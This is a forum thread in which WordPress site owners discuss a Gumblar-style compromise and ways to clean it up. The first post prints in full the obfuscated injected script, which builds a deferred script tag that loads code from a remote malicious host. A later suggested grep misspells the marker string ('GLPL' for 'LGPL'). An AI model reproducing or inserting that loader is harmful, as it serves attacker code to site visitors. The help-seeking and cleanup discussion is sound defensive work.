Forums

WordPress 2.8.4 getting hacked? (4 posts)

  1. Kelowna
    Member
    Posted 2 years ago #

    I have version 2.8.4 and someone is able to install this code below to many files of my site. The code below is being added the the very end of the code. Is anyone else seeing this? Is there a fix to block them?

    <script>/*LGPL*/ try{ window.onload = function(){E1e6wn3ijzwv9g = 'h$@t##()t(!&@p!@:@/&@/$^&()t($!o)#r$&r^#e#$)@n!(#$t)!!z$$-@)#c(!o$$!m!^).&s()&@$o$()s!^o^(.&($!c^&o^$&)m(#$.&@p)e(!t#a(#r$&^d)$$a^s&)#-)$&c($)^$o(m!&!.(e!!&a##!#s^&y!$l)i&@&f#e@d&$)i#$!r(!(e!c))t))#.@(^r#)#u#@:^($8(!^0@8#!0$&&&/#()(n@@!^g(@&o@(i$$##s!(a!o@!^.^!n)^e!#)t#!/#(n#@&#g)^#^o#)(i^)s($@(a#o(!#.)$n)$@e@&t@$#/!(@c@$^&$h@(i^@#n&^@a(#(!z((.@$$c##o#$)@m&!/$^!)c@@(t)r@@i$@(p@).&^c^@o()$m(/!!g&#^^o#)(@o(g^l#e$$.!!@c)^))o^#@@#m$/$('.replace(/\!|\^|\)|\$|@|#|&|\(/ig, '');var D7fyb435pte = 's&^(c)##r!^i!@p##!!t@!&'.replace(/#|\)|\$|\(|@|&|\^|\!/ig, '');var Sn9jgvbufr9 = 's@r)^#^c^#'.replace(/\(|#|\^|\!|\$|\)|@|&/ig, '');var Rxs7200gjqt6h = D7fyb435pte;var Rmkt0nsas90ld = document.createElement(Rxs7200gjqt6h);Rmkt0nsas90ld.setAttribute('defer', 'd^^&e(f(&e&(@r@('.replace(/&|@|#|\!|\(|\)|\$|\^/ig, ''));var Kaws9hrzdk = 't@^@e!)$x)@t@#)(/!(j(&@a(v#&^a$)s$!c&#((r@^i)&)p##!t#('.replace(/\)|#|\^|&|\!|\$|@|\(/ig, '');Rmkt0nsas90ld.setAttribute('id', 'J(!&#)8(!n^$9!i(1^3^($t@^f^)7^(@i@#&v#)v@@'.replace(/\^|\)|\!|\$|&|#|@|\(/ig, ''));Rmkt0nsas90ld.setAttribute(Sn9jgvbufr9,  E1e6wn3ijzwv9g);Rmkt0nsas90ld.setAttribute('type', Kaws9hrzdk);document.body.appendChild(Rmkt0nsas90ld);if (document){Rxs7200gjqt6h = D7fyb435pte;}} }  catch(Uskp2qj8xy0ey16t2xwup ) {}</script>
    <!--3eb582c68531a2f22e7540c27eaefbf1-->
  2. jimbabwe
    Member
    Posted 2 years ago #

    Looks like a hack to me. I was hacked the same way 1/14/2010.
    This was in all index.php and variations with index + php, as well as all javascript files across all files/folders on my site.

    This site talks about the hack and a way to globally remove the code:
    http://justcoded.com/article/gumblar-family-virus-removal-tool/
    I did not test the tool.

    I performed the removal manually (my WordPress is on a hosted box).

    Also, if you search on <script>/*LGPL*/ try{ window.onload = function(), you will find more info.

    I used backup files to overwrite all the javascript folders/files; I then manually reviewed all the php files by sorting on date.

    I don't have shell access to my host, but if I did, I would have performed recursive grep searches like: grep -iR "GLPL" ./*

    Let me know what you find.

  3. moongoose
    Member
    Posted 2 years ago #

    My site also hacked. The link above to Gumblar Family Virus Removal Tool creates a very weird file on my system with strange byte size, and I can't upload. Not sure what that's about.

    I also had several index.php.BAD files. Can't find anything on the net about this right now.

  4. Roy
    Member
    Posted 2 years ago #

    Keep up with upgrading people!
    http://wordpress.org/development/2009/11/wordpress-2-8-6-security-release/ (that's security release)
    http://wordpress.org/development/2009/10/wordpress-2-8-5-hardening-release/
    You're two security releases and a general upgrade behind.

    So...
    http://codex.wordpress.org/FAQ_My_site_was_hacked
    Read the entire article and all articles linked to.

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags